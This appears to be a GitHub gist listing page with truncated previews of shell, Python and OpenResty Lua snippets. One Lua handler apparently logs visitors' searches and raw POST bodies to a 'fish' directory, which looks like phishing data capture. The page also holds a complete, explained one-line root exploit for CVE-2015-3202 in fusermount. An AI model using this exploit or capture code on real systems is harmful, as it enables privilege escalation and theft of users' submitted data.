This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# Author: Denny Huang <denny0223@gmail.com> | |
# Wed Sep 17 2014 | |
# MIT License | |
function downloadBlob { | |
echo downloadBlob $1 | |
mkdir -p ${1:0:2} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import requests, re, threading, time, sys, copy | |
def checksucc(func): | |
def _func(*args, **kwargs): | |
self = args[0] | |
if not self.succ: | |
print "[error] {info}".format(info = self.error) | |
return sys.exit(0) | |
else: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
local result = "" | |
local ips = red:keys("*") | |
for k1,ip in pairs(ips) do | |
result = result .. ip .. ":\n" | |
local words = red:smembers(ip) | |
for k2,word in pairs(words) do | |
result = result .. "\tSearch: " .. word .. "\n" | |
end | |
end | |
ngx.header.content_type = 'text/plain'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
red = redis:new() | |
red:set_timeout(1000) | |
local ok, err = red:connect("127.0.0.1", 6379) | |
if not ok then | |
ngx.log(ngx.WARN, "failed to connect: ", err) | |
return | |
end | |
ok, err = red:select(2) | |
if not ok then | |
ngx.log("failed to select: ", err) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if ngx.var.host == "xdsec.mhz.pw" then | |
local args = ngx.req.get_uri_args() | |
if args["q"] then | |
writefile("/home/wwwroot/fish/"..ngx.var.host..".txt", "search: " .. args["q"] .. "\n") | |
end | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
local method=ngx.req.get_method() | |
if in_array(ngx.var.host, valid_host) then | |
if method == "POST" then | |
ngx.req.read_body() | |
local data = ngx.req.get_body_data() | |
writefile("/home/wwwroot/fish/"..ngx.var.host..".txt", data .. "\n") | |
end | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
local zlib = require "zlib" | |
function decode(str) | |
if unexpected_condition then error() end | |
local stream = zlib.inflate() | |
local ret = stream(str) | |
return ret | |
end | |
function callback() | |
local str = ngx.arg[1] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. | |
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 | |
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 | |
# Here's how it works, $a holds the name of a shellscript to be executed as | |
# root. | |
a=/tmp/.$$; | |
# $b is used twice, first to build the contents of shellscript $a, and then as |
NewerOlder